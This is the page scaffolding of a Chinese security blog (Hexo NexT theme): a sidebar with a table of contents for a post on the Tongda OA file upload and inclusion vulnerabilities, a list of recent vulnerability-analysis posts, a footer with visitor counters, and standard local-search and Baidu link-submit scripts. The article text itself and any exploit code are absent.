      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/wechat-qcode.jpg" alt="扫码关注公众号(SecurityCN)">
            
              <p class="site-author-name" itemprop="name">扫码关注公众号(SecurityCN)</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">12</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/securitycn" target="_blank" title="github">
                      
                        <i class="fa fa-fw fa-globe"></i>github</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="http://www.ja0k.com/images/wechat-qcode.jpg" target="_blank" title="wechat">
                      
                        <i class="fa fa-fw fa-globe"></i>wechat</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:securitycn@qq.com" target="_blank" title="E-mail">
                      
                        <i class="fa fa-fw fa-globe"></i>E-mail</a>
                  </span>
                
            </div>
          

          
          

          
          
		  
    <div class="links-of-blogroll motion-element links-of-blogroll-block">
      <div class="links-of-blogroll-title">
        <!-- modify icon to fire by szw -->
        <i class="fa fa-history fa-" aria-hidden="true"></i>
        近期文章
      </div>
      <ul class="links-of-blogroll-list">
        
        
          <li>
            <a href="/2020/06/28/【漏洞分析】CVE-2020-1948 Apache Dubbo RPC 反序列化漏洞分析/" title="【漏洞分析】CVE-2020-1948 Apache Dubbo 反序列化漏洞分析" target="_blank">【漏洞分析】CVE-2020-1948 Apache Dubbo 反序列化漏洞分析</a>
          </li>
        
          <li>
            <a href="/2020/06/05/【漏洞复现】CVE-2020-0796 SMBGhost RCE exp复现过程/media/" title="【漏洞复现】CVE-2020-0796 SMBGhost RCE exp复现过程" target="_blank">【漏洞复现】CVE-2020-0796 SMBGhost RCE exp复现过程</a>
          </li>
        
          <li>
            <a href="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/" title="【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造" target="_blank">【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造</a>
          </li>
        
          <li>
            <a href="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/" title="【漏洞分析&漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现" target="_blank">【漏洞分析&漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现</a>
          </li>
        
          <li>
            <a href="/2020/03/12/【漏洞通告】CVE-2020-0796Windows SMBv3远程代码执行漏洞安全通告（内含Exp视频和检测方法）/" title="【漏洞通告】CVE-2020-0796/Windows SMBv3远程代码执行漏洞安全通告(内含Exp视频和检测方法)" target="_blank">【漏洞通告】CVE-2020-0796/Windows SMBv3远程代码执行漏洞安全通告(内含Exp视频和检测方法)</a>
          </li>
        
      </ul>
    </div>


          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#二、漏洞信息"><span class="nav-number">1.</span> <span class="nav-text">二、漏洞信息</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#三、漏洞分析"><span class="nav-number">2.</span> <span class="nav-text">三、漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#3-1-补丁对比"><span class="nav-number">2.1.</span> <span class="nav-text">3.1 补丁对比</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#补丁1-ispirit-im-upload-php-任意文件上传漏洞"><span class="nav-number">2.1.1.</span> <span class="nav-text">补丁1: ispirit\im\upload.php 任意文件上传漏洞</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#补丁2：ispirit-interface-gateway-php-文件包含漏洞"><span class="nav-number">2.1.2.</span> <span class="nav-text">补丁2：ispirit/interface/gateway.php 文件包含漏洞</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#四、漏洞复现"><span class="nav-number">3.</span> <span class="nav-text">四、漏洞复现</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#五、修复建议"><span class="nav-number">4.</span> <span class="nav-text">五、修复建议</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#六、附录"><span class="nav-number">5.</span> <span class="nav-text">六、附录</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#本次分析及复现的相关工具地址"><span class="nav-number">5.1.</span> <span class="nav-text">本次分析及复现的相关工具地址</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#参考："><span class="nav-number">5.2.</span> <span class="nav-text">参考：</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">扫码关注公众号(SecurityCN)</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">14.5k</span>
  
</div>
<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>

<div class="powered-by">
<i class="fa fa-user-md"></i>
Hosted by<a href="https://www.upyun.com/?utm_source=lianmeng&utm_medium=referral" style="border:0">
    <img src="/images/upyun_logo.min.svg" style="width: 60px; display: inline; vertical-align: middle;">
  </a>

</div>

        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>访问总量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
